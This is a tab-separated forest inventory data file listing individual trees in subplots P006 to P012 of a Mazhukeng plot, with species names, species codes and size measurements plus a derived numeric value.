Mazhukeng	1	P006	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.5	6	4	0.00195805
Mazhukeng	1	P006	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.5	6.5	4	0.00211867
Mazhukeng	1	P006	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	8	9	7	0.0258628
Mazhukeng	1	P006	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2.5	3.5	2	0.00115149
Mazhukeng	1	P006	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	3.5	2.5	0.00162093
Mazhukeng	1	P006	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2.5	4	1.5	0.00131335
Mazhukeng	1	P006	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	2	0.00184878
Mazhukeng	1	P006	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	6	4	0.00718464
Mazhukeng	1	P006	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7.5	4	0.0125998
Mazhukeng	1	P006	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	2	3.5	3	0.000757716
Mazhukeng	1	P006	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	6	5	0.00472771
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	1.5	4	1.5	0.000503852
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4.5	8	6	0.00782793
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8	7	0.00953817
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	9	8	0.0150783
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	6	0.0393034
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	9	0.0286909
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	10	8	0.0357834
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	10	6	0.0932735
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	10	5	0.145312
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	10	6	0.145312
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	11	9	0.0393053
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	11	6	0.144222
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	12	9	0.191457
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	12	8	0.0734504
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	12	10	0.157128
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	13	10	0.247709
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8		0.00953817
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	9		0.0150783
Mazhukeng	1	P006	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	11		0.0572666
Mazhukeng	1	P006	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	3	2.5	0.000650978
Mazhukeng	1	P006	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	2	3.5	3	0.000757716
Mazhukeng	1	P006	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	3.5	6	5	0.00368033
Mazhukeng	1	P006	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	5	3	0.00845122
Mazhukeng	1	P006	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	6	3	0.00718464
Mazhukeng	1	P006	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6	3	0.0135042
Mazhukeng	1	P006	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	4	0.00836267
Mazhukeng	1	P006	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	9	8	0.0201331
Mazhukeng	1	P006	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	9	8	0.0201331
Mazhukeng	1	P006	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2.5	3	1.5	0.000989284
Mazhukeng	1	P006	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4.5	7	6	0.00686321
Mazhukeng	1	P006	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6.5	8	5	0.0156015
Mazhukeng	1	P007	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	15	11	8	0.102454
Mazhukeng	1	P007	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	17	11	9	0.129562
Mazhukeng	1	P007	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	17	11	8	0.129562
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	4	2	0.000864223
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	8	0.0393034
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	8	0.0286909
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	7	0.0286909
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	10	8	0.0613767
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	10	8	0.145312
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	11	9	0.024533
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	11	8	0.0478927
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	11	10	0.0674177
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	11	9	0.102454
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	11	9	0.175732
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	12	8	0.191457
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	12	8	0.191457
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	12	8	0.191457
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	9	0.209803
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	7	0.209803
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	10	0.209803
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	9	0.209803
Mazhukeng	1	P007	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	12	8	0.248834
Mazhukeng	1	P007	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	3	6	5	0.00275631
Mazhukeng	1	P007	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	4	0.00472771
Mazhukeng	1	P007	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	4	0.0101137
Mazhukeng	1	P007	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6	4	0.0135042
Mazhukeng	1	P008	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	4	7		0.00550289
Mazhukeng	1	P008	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	5	7		0.00836267
Mazhukeng	1	P008	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	2	4	3	0.000864223
Mazhukeng	1	P008	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	4	3	0.00184878
Mazhukeng	1	P008	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	4	3	0.00317108
Mazhukeng	1	P008	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8	6	0.00953817
Mazhukeng	1	P008	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	13	9	0.269246
Mazhukeng	1	P008	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	4	7	6	0.00550289
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	4	3	0.00184878
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	4	3	0.00184878
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	4	3	0.00184878
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	4	3	0.00317108
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	4		0.00905786
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	4		0.00905786
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6	3	0.0135042
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	4	0.00836267
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	4	0.011772
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	4	0.011772
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	6	0.0157184
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	4	0.0201917
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	8	5	0.0134267
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	8	7	0.0179278
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	8	6	0.0287229
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	8	6	0.0572463
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	9	4	0.0322561
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	10	7	0.0521352
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	10	8	0.0521352
Mazhukeng	1	P008	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	18	10	3	0.131299
Mazhukeng	1	P008	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	3	0.000864223
Mazhukeng	1	P008	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	5	0.00472771
Mazhukeng	1	P008	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	7	6	0.00836267
Mazhukeng	1	P008	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	7	5	0.00836267
Mazhukeng	1	P008	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	8	9	6	0.0258628
Mazhukeng	1	P008	Lauraceae	Machilus	Machilus chinensis	MACCHI	5	8	5	0.00953817
Mazhukeng	1	P009	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2	1	0.000118999
Mazhukeng	1	P009	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	3	0.000864223
Mazhukeng	1	P009	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	3	0.00184878
Mazhukeng	1	P009	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	5	4	0.00107666
Mazhukeng	1	P009	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	5	6	1	0.00718464
Mazhukeng	1	P009	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	8	8	6	0.0230299
Mazhukeng	1	P009	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	5	4	0.0220291
Mazhukeng	1	P009	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	6	10	8	0.0167271
Mazhukeng	1	P009	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	17	12	8	0.141155
Mazhukeng	1	P009	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	18	12	8	0.157128
Mazhukeng	1	P009	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	20	14	9	0.222849
Mazhukeng	1	P009	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	23	14	9	0.289634
Mazhukeng	1	P009	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2.5	1	0.00014825
Mazhukeng	1	P009	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	3	0.000235529
Mazhukeng	1	P009	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	3	0.000235529
Mazhukeng	1	P009	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	3	0.000235529
Mazhukeng	1	P009	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	9	5	0.0150783
Mazhukeng	1	P009	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	9	7	0.0322561
Mazhukeng	1	P009	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	6	0.0286909
Mazhukeng	1	P009	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	7	0.0286909
Mazhukeng	1	P009	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	11	7	0.210128
Mazhukeng	1	P009	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	2	3	1.5	0.000650978
Mazhukeng	1	P009	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	8	9	6	0.0258628
Mazhukeng	1	P009	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	9	10	6	0.0357834
Mazhukeng	1	P009	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	24	11	5	0.247375
Mazhukeng	1	P009	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	5	4	0.00845122
Mazhukeng	1	P009	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	7	5	0.0251831
Mazhukeng	1	P009	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	22	7	3	0.13463
Mazhukeng	1	P009	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2	1	0.000254566
Mazhukeng	1	P009	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2	1	0.000254566
Mazhukeng	1	P010	Rubiaceae	Tarenna	Tarenna mollissima (Hook. et Arn.) Rob.	TARMOL	2	4	1.5	0.000864223
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	2	0.000543971
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	4	1.5	0.000235529
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	3	0.000864223
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	5	3	0.00107666
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2	0.00230323
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	3	0.00230323
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	6	5	0.00275631
Mazhukeng	1	P010	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	7	5	0.00320825
Mazhukeng	1	P010	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	8	11	9	0.0315148
Mazhukeng	1	P010	Mimosaceae	Pithecellobium	Pithecellobium clypearia Benth.	PITCLY	21	12	9	0.209803
Mazhukeng	1	P010	Mimosaceae	Pithecellobium	Pithecellobium clypearia Benth.	PITCLY	22	12	9	0.22893
Mazhukeng	1	P010	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2	4	3	0.000864223
Mazhukeng	1	P010	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	6	4	0.00472771
Mazhukeng	1	P010	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	25	13	4	0.314822
Mazhukeng	1	P010	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2.5	1	0.00014825
Mazhukeng	1	P010	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	1	0.000317142
Mazhukeng	1	P010	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	5	6	4	0.00718464
Mazhukeng	1	P010	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	12	8	0.173897
Mazhukeng	1	P010	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	18	10	5	0.131299
Mazhukeng	1	P010	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	20	10	2	0.159986
Mazhukeng	1	P010	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	22	10	3	0.191299
Mazhukeng	1	P010	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	3	0.000864223
Mazhukeng	1	P010	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	7	5	0.00550289
Mazhukeng	1	P010	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	5	0.011772
Mazhukeng	1	P011	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	1.5	2.5	1.5	0.000317142
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1.4	0.000177413
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	0.6	0.000177413
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.5	0.000379528
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	2	0.000206502
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	1	0.000206502
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.5	0.000441757
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.8	0.000441757
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	0.5	0.000757716
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	1.6	0.000503852
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	1.6	0.000503852
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	1.5	0.000503852
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.5	0.000864223
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	0.6	0.000864223
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.2	0.00184878
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	0.8	0.00184878
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	1.5	0.00230323
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	5.5	2.5	0.00659455
Mazhukeng	1	P011	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	9	9.5	2	0.0340204
Mazhukeng	1	P011	Euphorbiaceae	Breynia	Breynia fruticosa (L.) Hook.f.	BREFRU	3	2	0.5	0.000934077
Mazhukeng	1	P011	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3.5	6	1.8	0.00368033
Mazhukeng	1	P011	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2.5	5	2.2	0.00163619
Mazhukeng	1	P011	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.2	0.5	0.000279622
Mazhukeng	1	P011	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.5	2.7	0.4	0.000891768
Mazhukeng	1	P011	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	4.5	0.3	0.0020762
Mazhukeng	1	P011	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	11	4.8	2.5	0.0253027
Mazhukeng	1	P011	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	8	3.2	0.0418484
Mazhukeng	1	P011	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	3	5	3	0.00230323
Mazhukeng	1	P011	Lauraceae	Litsea	Litsea cubeba	LITCUB	3	6	3	0.00275631
Mazhukeng	1	P011	Euphorbiaceae	Sapium	Sapium discolor (Champ.) Muell.-Arg.	SAPDIS	6	5	4	0.00845122
Mazhukeng	1	P011	Euphorbiaceae	Sapium	Sapium discolor (Champ.) Muell.-Arg.	SAPDIS	16	8	3.5	0.0845033
Mazhukeng	1	P011	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1.5	3	1.2	0.000379528
Mazhukeng	1	P011	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4	1.5	0.00184878
Mazhukeng	1	P011	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	4.5	2	0.00541185
Mazhukeng	1	P011	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	5	2.5	0.00230323
Mazhukeng	1	P011	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	6	2.5	0.0101137
Mazhukeng	1	P011	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	6	6.5	2.7	0.0109433
Mazhukeng	1	P011	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	4	6	3	0.00472771
Mazhukeng	1	P011	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	9	8	3.5	0.0287229
Mazhukeng	1	P011	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	9	9	3.5	0.0322561
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	2	4	2.5	0.000864223
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	4	2	0.00317108
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	4.5	2	0.0020762
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	6	2	0.00275631
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	2.8	0.00472771
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	3	0.00472771
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	7	4	0.00550289
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	7	3	0.00550289
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	2	0.0201917
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	1.5	0.0201917
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	8	7	0.0134267
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	8	6	0.0230299
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	8	3.2	0.0230299
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	8	1.8	0.0287229
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	8	2.1	0.0349983
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	9	3	0.0322561
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	15	9	2.6	0.0840793
Mazhukeng	1	P011	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	16	10	3.5	0.105275
Mazhukeng	1	P011	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	2.8	0.7	0.00060821
Mazhukeng	1	P011	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	0.6	0.000650978
Mazhukeng	1	P011	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	5	1.8	0.00600364
Mazhukeng	1	P011	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	3	0.011772
Mazhukeng	1	P012	Euphorbiaceae	Glochidion	Glochidion wrightii Benth.	GLOWRI	7	6	1.2	0.0135042
Mazhukeng	1	P012	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	0.8	0.000177413
